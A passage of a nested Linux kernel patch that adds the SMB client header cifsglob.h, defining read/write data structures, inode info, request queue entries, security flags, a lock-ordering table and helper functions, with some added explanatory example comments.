++	unsigned int		total_len;
++	bool			should_dirty;
++	/*
++	 * Indicates if this aio_ctx is for direct_io.
++	 * If yes, iter is a copy of the user-passed iov_iter.
++	 */
++	bool			direct_io;
++};
++
++/* asynchronous read support */
++struct cifs_readdata {
++	struct kref			refcount;
++	struct list_head		list;
++	struct completion		done;
++	struct cifsFileInfo		*cfile;
++	struct address_space		*mapping;
++	struct cifs_aio_ctx		*ctx;
++	__u64				offset;
++	unsigned int			bytes;
++	unsigned int			got_bytes;
++	pid_t				pid;
++	int				result;
++	struct work_struct		work;
++	int (*read_into_pages)(struct TCP_Server_Info *server,
++				struct cifs_readdata *rdata,
++				unsigned int len);
++	int (*copy_into_pages)(struct TCP_Server_Info *server,
++				struct cifs_readdata *rdata,
++				struct iov_iter *iter);
++	struct kvec			iov[2];
++	struct TCP_Server_Info		*server;
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	struct smbd_mr			*mr;
++#endif
++	unsigned int			pagesz;
++	unsigned int			page_offset;
++	unsigned int			tailsz;
++	struct cifs_credits		credits;
++	unsigned int			nr_pages;
++	struct page			**pages;
++};
++
++/* asynchronous write support */
++struct cifs_writedata {
++	struct kref			refcount;
++	struct list_head		list;
++	struct completion		done;
++	enum writeback_sync_modes	sync_mode;
++	struct work_struct		work;
++	struct cifsFileInfo		*cfile;
++	struct cifs_aio_ctx		*ctx;
++	__u64				offset;
++	pid_t				pid;
++	unsigned int			bytes;
++	int				result;
++	struct TCP_Server_Info		*server;
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	struct smbd_mr			*mr;
++#endif
++	unsigned int			pagesz;
++	unsigned int			page_offset;
++	unsigned int			tailsz;
++	struct cifs_credits		credits;
++	unsigned int			nr_pages;
++	struct page			**pages;
++};
++
++/*
++ * Take a reference on the file private data. Must be called with
++ * cfile->file_info_lock held.
++ */
++static inline void
++cifsFileInfo_get_locked(struct cifsFileInfo *cifs_file)
++{
++	++cifs_file->count;
++}
++
++struct cifsFileInfo *cifsFileInfo_get(struct cifsFileInfo *cifs_file);
++void _cifsFileInfo_put(struct cifsFileInfo *cifs_file, bool wait_oplock_hdlr,
++		       bool offload);
++void cifsFileInfo_put(struct cifsFileInfo *cifs_file);
++
++#define CIFS_CACHE_READ_FLG	1
++#define CIFS_CACHE_HANDLE_FLG	2
++#define CIFS_CACHE_RH_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_HANDLE_FLG)
++#define CIFS_CACHE_WRITE_FLG	4
++#define CIFS_CACHE_RW_FLG	(CIFS_CACHE_READ_FLG | CIFS_CACHE_WRITE_FLG)
++#define CIFS_CACHE_RHW_FLG	(CIFS_CACHE_RW_FLG | CIFS_CACHE_HANDLE_FLG)
++
++#define CIFS_CACHE_READ(cinode) ((cinode->oplock & CIFS_CACHE_READ_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE))
++#define CIFS_CACHE_HANDLE(cinode) (cinode->oplock & CIFS_CACHE_HANDLE_FLG)
++#define CIFS_CACHE_WRITE(cinode) ((cinode->oplock & CIFS_CACHE_WRITE_FLG) || (CIFS_SB(cinode->netfs.inode.i_sb)->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE))
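++
++/*
++ * Illustrative sketch (not part of the original patch): callers gate local
++ * caching on the oplock/lease level actually held, e.g. given a
++ * struct cifsInodeInfo *cinode (defined below):
++ *
++ *	if (CIFS_CACHE_WRITE(cinode))
++ *		; // may cache dirty data locally
++ *	else
++ *		; // must write through to the server
++ */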
++
++/*
++ * One of these for each file inode
++ */
++
++struct cifsInodeInfo {
++	struct netfs_inode netfs; /* Netfslib context and vfs inode */
++	bool can_cache_brlcks;
++	struct list_head llist;	/* locks held by this inode */
++	/*
++	 * NOTE: Some code paths call down_read(lock_sem) twice, so
++	 * we must always use cifs_down_write() instead of down_write()
++	 * for this semaphore to avoid deadlocks.
++	 */
++	struct rw_semaphore lock_sem;	/* protect the fields above */
++	/* BB add in lists for dirty pages i.e. write caching info for oplock */
++	struct list_head openFileList;
++	spinlock_t	open_file_lock;	/* protects openFileList */
++	__u32 cifsAttrs; /* e.g. DOS archive bit, sparse, compressed, system */
++	unsigned int oplock;		/* oplock/lease level we have */
++	unsigned int epoch;		/* used to track lease state changes */
++#define CIFS_INODE_PENDING_OPLOCK_BREAK   (0) /* oplock break in progress */
++#define CIFS_INODE_PENDING_WRITERS	  (1) /* Writes in progress */
++#define CIFS_INODE_FLAG_UNUSED		  (2) /* Unused flag */
++#define CIFS_INO_DELETE_PENDING		  (3) /* delete pending on server */
++#define CIFS_INO_INVALID_MAPPING	  (4) /* pagecache is invalid */
++#define CIFS_INO_LOCK			  (5) /* lock bit for synchronization */
++#define CIFS_INO_MODIFIED_ATTR            (6) /* Indicate change in mtime/ctime */
++#define CIFS_INO_CLOSE_ON_LOCK            (7) /* Not to defer the close when lock is set */
++	unsigned long flags;
++	spinlock_t writers_lock;
++	unsigned int writers;		/* Number of writers on this inode */
++	unsigned long time;		/* jiffies of last update of inode */
++	u64  server_eof;		/* current file size on server -- protected by i_lock */
++	u64  uniqueid;			/* server inode number */
++	u64  createtime;		/* creation time on server */
++	__u8 lease_key[SMB2_LEASE_KEY_SIZE];	/* lease key for this inode */
++	struct list_head deferred_closes; /* list of deferred closes */
++	spinlock_t deferred_lock; /* protection on deferred list */
++	bool lease_granted; /* Flag to indicate whether lease or oplock is granted. */
++	char *symlink_target;
++};
++
++static inline struct cifsInodeInfo *
++CIFS_I(struct inode *inode)
++{
++	return container_of(inode, struct cifsInodeInfo, netfs.inode);
++}
++
++static inline struct cifs_sb_info *
++CIFS_SB(struct super_block *sb)
++{
++	return sb->s_fs_info;
++}
++
++static inline struct cifs_sb_info *
++CIFS_FILE_SB(struct file *file)
++{
++	return CIFS_SB(file_inode(file)->i_sb);
++}
++
++static inline char CIFS_DIR_SEP(const struct cifs_sb_info *cifs_sb)
++{
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
++		return '/';
++	else
++		return '\\';
++}
++
++static inline void
++convert_delimiter(char *path, char delim)
++{
++	char old_delim, *pos;
++
++	if (delim == '/')
++		old_delim = '\\';
++	else
++		old_delim = '/';
++
++	pos = path;
++	while ((pos = strchr(pos, old_delim)))
++		*pos = delim;
++}
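++
++/*
++ * Illustrative sketch (not part of the original patch), assuming a
++ * writable copy of the path:
++ *
++ *	char path[] = "dir\\sub\\file";	// "dir\sub\file"
++ *
++ *	convert_delimiter(path, '/');	// path is now "dir/sub/file"
++ */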
++
++#define cifs_stats_inc atomic_inc
++
++static inline void cifs_stats_bytes_written(struct cifs_tcon *tcon,
++					    unsigned int bytes)
++{
++	if (bytes) {
++		spin_lock(&tcon->stat_lock);
++		tcon->bytes_written += bytes;
++		spin_unlock(&tcon->stat_lock);
++	}
++}
++
++static inline void cifs_stats_bytes_read(struct cifs_tcon *tcon,
++					 unsigned int bytes)
++{
++	spin_lock(&tcon->stat_lock);
++	tcon->bytes_read += bytes;
++	spin_unlock(&tcon->stat_lock);
++}
++
++
++/*
++ * This is the prototype for the mid receive function. This function is for
++ * receiving the rest of the SMB frame, starting with the WordCount (which is
++ * just after the MID in struct smb_hdr). Note:
++ *
++ * - This will be called by cifsd, with no locks held.
++ * - The mid will still be on the pending_mid_q.
++ * - mid->resp_buf will point to the current buffer.
++ *
++ * Returns zero on a successful receive, or an error. The receive state in
++ * the TCP_Server_Info will also be updated.
++ */
++typedef int (mid_receive_t)(struct TCP_Server_Info *server,
++			    struct mid_q_entry *mid);
++
++/*
++ * This is the prototype for the mid callback function. This is called once the
++ * mid has been received off of the socket. When creating one, take special
++ * care to avoid deadlocks. Things to bear in mind:
++ *
++ * - it will be called by cifsd, with no locks held
++ * - the mid will be removed from any lists
++ */
++typedef void (mid_callback_t)(struct mid_q_entry *mid);
++
++/*
++ * This is the prototype for the mid handle function. This is called once the
++ * mid has been recognized after decryption of the message.
++ */
++typedef int (mid_handle_t)(struct TCP_Server_Info *server,
++			    struct mid_q_entry *mid);
++
++/* one of these for every pending CIFS request to the server */
++struct mid_q_entry {
++	struct list_head qhead;	/* mids waiting on reply from this server */
++	struct kref refcount;
++	struct TCP_Server_Info *server;	/* server corresponding to this mid */
++	__u64 mid;		/* multiplex id */
++	__u16 credits;		/* number of credits consumed by this mid */
++	__u16 credits_received;	/* number of credits from the response */
++	__u32 pid;		/* process id */
++	__u32 sequence_number;  /* for CIFS signing */
++	unsigned long when_alloc;  /* when mid was created */
++#ifdef CONFIG_CIFS_STATS2
++	unsigned long when_sent; /* time when smb send finished */
++	unsigned long when_received; /* when demux complete (taken off wire) */
++#endif
++	mid_receive_t *receive; /* call receive callback */
++	mid_callback_t *callback; /* call completion callback */
++	mid_handle_t *handle; /* call handle mid callback */
++	void *callback_data;	  /* general purpose pointer for callback */
++	struct task_struct *creator;
++	void *resp_buf;		/* pointer to received SMB header */
++	unsigned int resp_buf_size;
++	int mid_state;	/* wish this were an enum but it cannot be passed to wait_event */
++	unsigned int mid_flags;
++	__le16 command;		/* smb command code */
++	unsigned int optype;	/* operation type */
++	bool large_buf:1;	/* if valid response, is pointer to large buf */
++	bool multiRsp:1;	/* multiple trans2 responses for one request  */
++	bool multiEnd:1;	/* both received */
++	bool decrypted:1;	/* decrypted entry */
++};
++
++struct close_cancelled_open {
++	struct cifs_fid         fid;
++	struct cifs_tcon        *tcon;
++	struct work_struct      work;
++	__u64 mid;
++	__u16 cmd;
++};
++
++/*
++ * Make code in transport.c a little cleaner by moving
++ * the update of optional stats into the functions below.
++ */
++static inline void cifs_in_send_inc(struct TCP_Server_Info *server)
++{
++	atomic_inc(&server->in_send);
++}
++
++static inline void cifs_in_send_dec(struct TCP_Server_Info *server)
++{
++	atomic_dec(&server->in_send);
++}
++
++static inline void cifs_num_waiters_inc(struct TCP_Server_Info *server)
++{
++	atomic_inc(&server->num_waiters);
++}
++
++static inline void cifs_num_waiters_dec(struct TCP_Server_Info *server)
++{
++	atomic_dec(&server->num_waiters);
++}
++
++#ifdef CONFIG_CIFS_STATS2
++static inline void cifs_save_when_sent(struct mid_q_entry *mid)
++{
++	mid->when_sent = jiffies;
++}
++#else
++static inline void cifs_save_when_sent(struct mid_q_entry *mid)
++{
++}
++#endif
++
++/* for pending dnotify requests */
++struct dir_notify_req {
++	struct list_head lhead;
++	__le16 Pid;
++	__le16 PidHigh;
++	__u16 Mid;
++	__u16 Tid;
++	__u16 Uid;
++	__u16 netfid;
++	__u32 filter; /* CompletionFilter (for multishot) */
++	int multishot;
++	struct file *pfile;
++};
++
++struct dfs_info3_param {
++	int flags; /* DFSREF_REFERRAL_SERVER, DFSREF_STORAGE_SERVER*/
++	int path_consumed;
++	int server_type;
++	int ref_flag;
++	char *path_name;
++	char *node_name;
++	int ttl;
++};
++
++struct file_list {
++	struct list_head list;
++	struct cifsFileInfo *cfile;
++};
++
++static inline void free_dfs_info_param(struct dfs_info3_param *param)
++{
++	if (param) {
++		kfree(param->path_name);
++		kfree(param->node_name);
++	}
++}
++
++static inline void free_dfs_info_array(struct dfs_info3_param *param,
++				       int number_of_items)
++{
++	int i;
++	if ((number_of_items == 0) || (param == NULL))
++		return;
++	for (i = 0; i < number_of_items; i++) {
++		kfree(param[i].path_name);
++		kfree(param[i].node_name);
++	}
++	kfree(param);
++}
++
++static inline bool is_interrupt_error(int error)
++{
++	switch (error) {
++	case -EINTR:
++	case -ERESTARTSYS:
++	case -ERESTARTNOHAND:
++	case -ERESTARTNOINTR:
++		return true;
++	}
++	return false;
++}
++
++static inline bool is_retryable_error(int error)
++{
++	if (is_interrupt_error(error) || error == -EAGAIN)
++		return true;
++	return false;
++}
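++
++/*
++ * Typical use of the helpers above (illustrative sketch; some_smb_op is
++ * a hypothetical stand-in for a real SMB operation):
++ *
++ *	do {
++ *		rc = some_smb_op(xid, tcon, ...);
++ *	} while (is_retryable_error(rc));
++ */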
++
++
++/* cifs_get_writable_file() flags */
++#define FIND_WR_ANY         0
++#define FIND_WR_FSUID_ONLY  1
++#define FIND_WR_WITH_DELETE 2
++
++#define   MID_FREE 0
++#define   MID_REQUEST_ALLOCATED 1
++#define   MID_REQUEST_SUBMITTED 2
++#define   MID_RESPONSE_RECEIVED 4
++#define   MID_RETRY_NEEDED      8 /* session closed while this request out */
++#define   MID_RESPONSE_MALFORMED 0x10
++#define   MID_SHUTDOWN		 0x20
++
++/* Flags */
++#define   MID_WAIT_CANCELLED	 1 /* Cancelled while waiting for response */
++#define   MID_DELETED            2 /* Mid has been dequeued/deleted */
++
++/* Types of response buffer returned from SendReceive2 */
++#define   CIFS_NO_BUFFER        0    /* Response buffer not returned */
++#define   CIFS_SMALL_BUFFER     1
++#define   CIFS_LARGE_BUFFER     2
++#define   CIFS_IOVEC            4    /* array of response buffers */
++
++/* Type of Request to SendReceive2 */
++#define   CIFS_BLOCKING_OP      1    /* operation can block */
++#define   CIFS_NON_BLOCKING     2    /* do not block waiting for credits */
++#define   CIFS_TIMEOUT_MASK 0x003    /* only one of above set in req */
++#define   CIFS_LOG_ERROR    0x010    /* log NT STATUS if non-zero */
++#define   CIFS_LARGE_BUF_OP 0x020    /* large request buffer */
++#define   CIFS_NO_RSP_BUF   0x040    /* no response buffer required */
++
++/* Type of request operation */
++#define   CIFS_ECHO_OP            0x080  /* echo request */
++#define   CIFS_OBREAK_OP          0x0100 /* oplock break request */
++#define   CIFS_NEG_OP             0x0200 /* negotiate request */
++#define   CIFS_CP_CREATE_CLOSE_OP 0x0400 /* compound create+close request */
++/* Lower bitmask values are reserved by others below. */
++#define   CIFS_SESS_OP            0x2000 /* session setup request */
++#define   CIFS_OP_MASK            0x2780 /* mask request type */
++
++#define   CIFS_HAS_CREDITS        0x0400 /* already has credits */
++#define   CIFS_TRANSFORM_REQ      0x0800 /* transform request before sending */
++#define   CIFS_NO_SRV_RSP         0x1000 /* there is no server response */
++
++/* Security Flags: indicate type of session setup needed */
++#define   CIFSSEC_MAY_SIGN	0x00001
++#define   CIFSSEC_MAY_NTLMV2	0x00004
++#define   CIFSSEC_MAY_KRB5	0x00008
++#define   CIFSSEC_MAY_SEAL	0x00040 /* not supported yet */
++#define   CIFSSEC_MAY_NTLMSSP	0x00080 /* raw ntlmssp with ntlmv2 */
++
++#define   CIFSSEC_MUST_SIGN	0x01001
++/* note that only one of the following MUST flags should be set;
++the result of setting more than one is to require use of
++the stronger protocol */
++#define   CIFSSEC_MUST_NTLMV2	0x04004
++#define   CIFSSEC_MUST_KRB5	0x08008
++#ifdef CONFIG_CIFS_UPCALL
++#define   CIFSSEC_MASK          0x8F08F /* flags supported if no weak allowed */
++#else
++#define	  CIFSSEC_MASK          0x87087 /* flags supported if no weak allowed */
++#endif /* UPCALL */
++#define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
++#define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
++
++#define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP)
++#define   CIFSSEC_MAX (CIFSSEC_MUST_NTLMV2)
++#define   CIFSSEC_AUTH_MASK (CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP)
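++
++/*
++ * Worked example (illustrative, not part of the original patch): each
++ * CIFSSEC_MUST_* value is its CIFSSEC_MAY_* bit ORed with that same bit
++ * shifted left by 12, e.g.
++ *
++ *	CIFSSEC_MUST_NTLMV2 = (CIFSSEC_MAY_NTLMV2 << 12) | CIFSSEC_MAY_NTLMV2
++ *	                    = (0x00004 << 12) | 0x00004 = 0x04004
++ *
++ * so every MUST flag also implies the corresponding MAY flag.
++ */
++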
++/*
++ *****************************************************************
++ * All constants go here
++ *****************************************************************
++ */
++
++#define UID_HASH (16)
++
++/*
++ * Note that ONE module should define DECLARE_GLOBALS_HERE to cause the
++ * following to be declared.
++ */
++
++/****************************************************************************
++ * Here are all the locks (spinlock, mutex, semaphore) in cifs.ko, arranged
++ * according to the locking order, i.e. if two locks are to be held together,
++ * the lock that appears higher in this list needs to be taken before the other.
++ *
++ * If you hold a lock that is lower in this list, and you need to take a higher lock
++ * (or if you think that one of the functions that you're calling may need to), first
++ * drop the lock you hold, pick up the higher lock, then the lower one. This will
++ * ensure that locks are picked up only in one direction in the below table
++ * (top to bottom).
++ *
++ * Also, if you expect a function to be called with a lock held, explicitly document
++ * this in the comments on top of your function definition.
++ *
++ * Also, try to keep critical sections (lock hold times) as short as
++ * possible. Blocking or calling other functions with a lock held always
++ * increases the risk of a deadlock.
++ *
++ * Following these rules will avoid unnecessary deadlocks, which can get
++ * really hard to debug.
++ *
++ * Please add any new lock you introduce (or any existing lock you find
++ * missing from this list) in the position that the expected locking
++ * order dictates.
++ *
++ * =====================================================================================
++ * Lock				Protects			Initialization fn
++ * =====================================================================================
++ * vol_list_lock
++ * vol_info->ctx_lock		vol_info->ctx
++ * cifs_sb_info->tlink_tree_lock	cifs_sb_info->tlink_tree	cifs_setup_cifs_sb
++ * TCP_Server_Info->		TCP_Server_Info			cifs_get_tcp_session
++ * reconnect_mutex
++ * TCP_Server_Info->srv_mutex	TCP_Server_Info			cifs_get_tcp_session
++ * cifs_ses->session_mutex		cifs_ses		sesInfoAlloc
++ *				cifs_tcon
++ * cifs_tcon->open_file_lock	cifs_tcon->openFileList		tconInfoAlloc
++ *				cifs_tcon->pending_opens
++ * cifs_tcon->stat_lock		cifs_tcon->bytes_read		tconInfoAlloc
++ *				cifs_tcon->bytes_written
++ * cifs_tcp_ses_lock		cifs_tcp_ses_list		sesInfoAlloc
++ * GlobalMid_Lock		GlobalMaxActiveXid		init_cifs
++ *				GlobalCurrentXid
++ *				GlobalTotalActiveXid
++ * TCP_Server_Info->srv_lock	(anything in struct not protected by another lock and can change)
++ * TCP_Server_Info->mid_lock	TCP_Server_Info->pending_mid_q	cifs_get_tcp_session
++ *				->CurrentMid
++ *				(any changes in mid_q_entry fields)
++ * TCP_Server_Info->req_lock	TCP_Server_Info->in_flight	cifs_get_tcp_session
++ *				->credits
++ *				->echo_credits
++ *				->oplock_credits
++ *				->reconnect_instance
++ * cifs_ses->ses_lock		(anything that is not protected by another lock and can change)
++ * cifs_ses->iface_lock		cifs_ses->iface_list		sesInfoAlloc
++ *				->iface_count
++ *				->iface_last_update
++ * cifs_ses->chan_lock		cifs_ses->chans
++ *				->chans_need_reconnect
++ *				->chans_in_reconnect
++ * cifs_tcon->tc_lock		(anything that is not protected by another lock and can change)
++ * cifsInodeInfo->open_file_lock	cifsInodeInfo->openFileList	cifs_alloc_inode
++ * cifsInodeInfo->writers_lock	cifsInodeInfo->writers		cifsInodeInfo_alloc
++ * cifsInodeInfo->lock_sem	cifsInodeInfo->llist		cifs_init_once
++ *				->can_cache_brlcks
++ * cifsInodeInfo->deferred_lock	cifsInodeInfo->deferred_closes	cifsInodeInfo_alloc
++ * cached_fid->fid_mutex		cifs_tcon->crfid		tconInfoAlloc
++ * cifsFileInfo->fh_mutex		cifsFileInfo			cifs_new_fileinfo
++ * cifsFileInfo->file_info_lock	cifsFileInfo->count		cifs_new_fileinfo
++ *				->invalidHandle			initiate_cifs_search
++ *				->oplock_break_cancelled
++ * cifs_aio_ctx->aio_mutex		cifs_aio_ctx			cifs_aio_ctx_alloc
++ ****************************************************************************/
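++
++/*
++ * Illustrative sketch (not part of the original patch): per the table
++ * above, cifs_tcp_ses_lock ranks above TCP_Server_Info->srv_lock, so with
++ * a hypothetical TCP_Server_Info *server, nested acquisition must follow
++ * that order:
++ *
++ *	spin_lock(&cifs_tcp_ses_lock);
++ *	spin_lock(&server->srv_lock);
++ *	...
++ *	spin_unlock(&server->srv_lock);
++ *	spin_unlock(&cifs_tcp_ses_lock);
++ */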
++
++#ifdef DECLARE_GLOBALS_HERE
++#define GLOBAL_EXTERN
++#else
++#define GLOBAL_EXTERN extern
++#endif
++
++/*
++ * the list of TCP_Server_Info structures, i.e. each of the sockets
++ * connecting our client to a distinct server (ip address), is
++ * chained together by cifs_tcp_ses_list. The list of all our SMB
++ * sessions (and from that the tree connections) can be found
++ * by iterating over cifs_tcp_ses_list
++ */
++extern struct list_head		cifs_tcp_ses_list;
++
++/*
++ * This lock protects the cifs_tcp_ses_list, the list of smb sessions per
++ * tcp session, and the list of tcon's per smb session. It also protects
++ * the reference counters for the server, smb session, and tcon.
++ * Generally the locks should be taken in the order tcp_ses_lock before
++ * tcon->open_file_lock and that before file->file_info_lock, since the
++ * structure order is cifs_socket-->cifs_ses-->cifs_tcon-->cifs_file.
++ */
++extern spinlock_t		cifs_tcp_ses_lock;
++
++/*
++ * Global transaction id (XID) information
++ */
++extern unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Lock */
++extern unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Lock */
++extern unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Lock */
++extern spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
++
++/*
++ *  Global counters, updated atomically
++ */
++extern atomic_t sesInfoAllocCount;
++extern atomic_t tconInfoAllocCount;
++extern atomic_t tcpSesNextId;
++extern atomic_t tcpSesAllocCount;
++extern atomic_t tcpSesReconnectCount;
++extern atomic_t tconInfoReconnectCount;
++
++/* Various Debug counters */
++extern atomic_t buf_alloc_count;	/* current number allocated  */
++extern atomic_t small_buf_alloc_count;
++#ifdef CONFIG_CIFS_STATS2
++extern atomic_t total_buf_alloc_count; /* total allocated over all time */
++extern atomic_t total_small_buf_alloc_count;
++extern unsigned int slow_rsp_threshold; /* number of secs before logging */
++#endif
++
++/* Misc globals */
++extern bool enable_oplocks; /* enable or disable oplocks */
++extern bool lookupCacheEnabled;
++extern unsigned int global_secflags;	/* if on, session setup sent
++				with more secure ntlmssp2 challenge/resp */
++extern unsigned int sign_CIFS_PDUs;  /* enable smb packet signing */
++extern bool enable_gcm_256; /* allow optional negotiate of strongest signing (aes-gcm-256) */
++extern bool require_gcm_256; /* require use of strongest signing (aes-gcm-256) */
++extern bool enable_negotiate_signing; /* request use of faster (GMAC) signing if available */
++extern bool linuxExtEnabled; /* enable Linux/Unix CIFS extensions */
++extern unsigned int CIFSMaxBufSize;  /* max size not including hdr */
++extern unsigned int cifs_min_rcv;    /* min size of big ntwrk buf pool */
++extern unsigned int cifs_min_small;  /* min size of small buf pool */
++extern unsigned int cifs_max_pending; /* MAX requests at once to server*/
++extern bool disable_legacy_dialects;  /* forbid vers=1.0 and vers=2.0 mounts */
++extern atomic_t mid_count;
++
++void cifs_oplock_break(struct work_struct *work);
++void cifs_queue_oplock_break(struct cifsFileInfo *cfile);
++void smb2_deferred_work_close(struct work_struct *work);
++
++extern const struct slow_work_ops cifs_oplock_break_ops;
++extern struct workqueue_struct *cifsiod_wq;
++extern struct workqueue_struct *decrypt_wq;
++extern struct workqueue_struct *fileinfo_put_wq;
++extern struct workqueue_struct *cifsoplockd_wq;
++extern struct workqueue_struct *deferredclose_wq;
++extern __u32 cifs_lock_secret;
++
++extern mempool_t *cifs_mid_poolp;
++
++/* Operations for different SMB versions */
++#define SMB1_VERSION_STRING	"1.0"
++#define SMB20_VERSION_STRING    "2.0"
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++extern struct smb_version_operations smb1_operations;
++extern struct smb_version_values smb1_values;
++extern struct smb_version_operations smb20_operations;
++extern struct smb_version_values smb20_values;
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++#define SMB21_VERSION_STRING	"2.1"
++extern struct smb_version_operations smb21_operations;
++extern struct smb_version_values smb21_values;
++#define SMBDEFAULT_VERSION_STRING "default"
++extern struct smb_version_values smbdefault_values;
++#define SMB3ANY_VERSION_STRING "3"
++extern struct smb_version_values smb3any_values;
++#define SMB30_VERSION_STRING	"3.0"
++extern struct smb_version_operations smb30_operations;
++extern struct smb_version_values smb30_values;
++#define SMB302_VERSION_STRING	"3.02"
++#define ALT_SMB302_VERSION_STRING "3.0.2"
++/*extern struct smb_version_operations smb302_operations;*/ /* not needed yet */
++extern struct smb_version_values smb302_values;
++#define SMB311_VERSION_STRING	"3.1.1"
++#define ALT_SMB311_VERSION_STRING "3.11"
++extern struct smb_version_operations smb311_operations;
++extern struct smb_version_values smb311_values;
++
++static inline char *get_security_type_str(enum securityEnum sectype)
++{
++	switch (sectype) {
++	case RawNTLMSSP:
++		return "RawNTLMSSP";
++	case Kerberos:
++		return "Kerberos";
++	case NTLMv2:
++		return "NTLMv2";
++	default:
++		return "Unknown";
++	}
++}
++
++static inline bool is_smb1_server(struct TCP_Server_Info *server)
++{
++	return strcmp(server->vals->version_string, SMB1_VERSION_STRING) == 0;
++}
++
++static inline bool is_tcon_dfs(struct cifs_tcon *tcon)
++{
++	/*
++	 * For SMB1, see MS-CIFS 2.4.55 SMB_COM_TREE_CONNECT_ANDX (0x75) and MS-CIFS 3.3.4.4 DFS
++	 * Subsystem Notifies That a Share Is a DFS Share.
++	 *
++	 * For SMB2+, see MS-SMB2 2.2.10 SMB2 TREE_CONNECT Response and MS-SMB2 3.3.4.14 Server
++	 * Application Updates a Share.
++	 */
++	if (!tcon || !tcon->ses || !tcon->ses->server)
++		return false;
++	return is_smb1_server(tcon->ses->server) ? tcon->Flags & SMB_SHARE_IS_IN_DFS :
++		tcon->share_flags & (SHI1005_FLAGS_DFS | SHI1005_FLAGS_DFS_ROOT);
++}
++
++static inline bool cifs_is_referral_server(struct cifs_tcon *tcon,
++					   const struct dfs_info3_param *ref)
++{
++	/*
++	 * Check if all targets are capable of handling DFS referrals as per
++	 * MS-DFSC 2.2.4 RESP_GET_DFS_REFERRAL.
++	 */
++	return is_tcon_dfs(tcon) || (ref && (ref->flags & DFSREF_REFERRAL_SERVER));
++}
++
++static inline u64 cifs_flock_len(const struct file_lock *fl)
++{
++	return (u64)fl->fl_end - fl->fl_start + 1;
++}
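++
++/*
++ * Worked example (illustrative): a lock with fl_start = 0 and
++ * fl_end = 4095 covers bytes 0 through 4095 inclusive, so
++ * cifs_flock_len() returns 4095 - 0 + 1 = 4096.
++ */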
++
++static inline size_t ntlmssp_workstation_name_size(const struct cifs_ses *ses)
++{
++	if (WARN_ON_ONCE(!ses || !ses->server))
++		return 0;
++	/*
++	 * Make workstation name no more than 15 chars when using insecure dialects as some legacy
++	 * servers do require it during NTLMSSP.
++	 */
++	if (ses->server->dialect <= SMB20_PROT_ID)
++		return min_t(size_t, sizeof(ses->workstation_name), RFC1001_NAME_LEN_WITH_NULL);
++	return sizeof(ses->workstation_name);
++}
++
++static inline void move_cifs_info_to_smb2(struct smb2_file_all_info *dst, const FILE_ALL_INFO *src)
++{
++	memcpy(dst, src, (size_t)((u8 *)&src->AccessFlags - (u8 *)src));
++	dst->AccessFlags = src->AccessFlags;
++	dst->CurrentByteOffset = src->CurrentByteOffset;
++	dst->Mode = src->Mode;
++	dst->AlignmentRequirement = src->AlignmentRequirement;
++	dst->FileNameLength = src->FileNameLength;
++}
++
++static inline unsigned int cifs_get_num_sgs(const struct smb_rqst *rqst,
++					    int num_rqst,
++					    const u8 *sig)
++{
++	unsigned int len, skip;
++	unsigned int nents = 0;
++	unsigned long addr;
++	int i, j;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
++		for (j = 0; j < rqst[i].rq_nvec; j++) {
++			struct kvec *iov = &rqst[i].rq_iov[j];
++
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			if (unlikely(is_vmalloc_addr((void *)addr))) {
++				len = iov->iov_len - skip;
++				nents += DIV_ROUND_UP(offset_in_page(addr) + len,
++						      PAGE_SIZE);
++			} else {
++				nents++;
++			}
++		}
++		nents += rqst[i].rq_npages;
++	}
++	nents += DIV_ROUND_UP(offset_in_page(sig) + SMB2_SIGNATURE_SIZE, PAGE_SIZE);
++	return nents;
++}
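++
++/*
++ * Worked example (illustrative): a single rqst with two kmalloc'ed iovs
++ * (the transform header plus one data buffer) and no pages contributes
++ * nents = 2; with rq_npages = 0 and a signature that fits in one page,
++ * the function returns 2 + 0 + 1 = 3.
++ */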
++
++/* We can not use the normal sg_set_buf() as we will sometimes pass a
++ * stack object as buf.
++ */
++static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
++						  const void *buf,
++						  unsigned int buflen)
++{
++	unsigned long addr = (unsigned long)buf;
++	unsigned int off = offset_in_page(addr);
++
++	addr &= PAGE_MASK;
++	if (unlikely(is_vmalloc_addr((void *)addr))) {
++		do {
++			unsigned int len = min_t(unsigned int, buflen, PAGE_SIZE - off);
++
++			sg_set_page(sg++, vmalloc_to_page((void *)addr), len, off);
++
++			off = 0;
++			addr += PAGE_SIZE;
++			buflen -= len;
++		} while (buflen);
++	} else {
++		sg_set_page(sg++, virt_to_page(addr), buflen, off);
++	}
++	return sg;
++}
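++
++/*
++ * Illustrative use (hypothetical buffer names, not part of the original
++ * patch): chaining a stack-resident header and a payload buffer into a
++ * scatterlist for the crypto layer:
++ *
++ *	sg = cifs_sg_set_buf(sg, &tr_hdr, sizeof(tr_hdr));
++ *	sg = cifs_sg_set_buf(sg, payload, payload_len);
++ */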
++
++#endif	/* _CIFS_GLOB_H */
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+new file mode 100644
+index 0000000000000..cc458b98441c7
+--- /dev/null
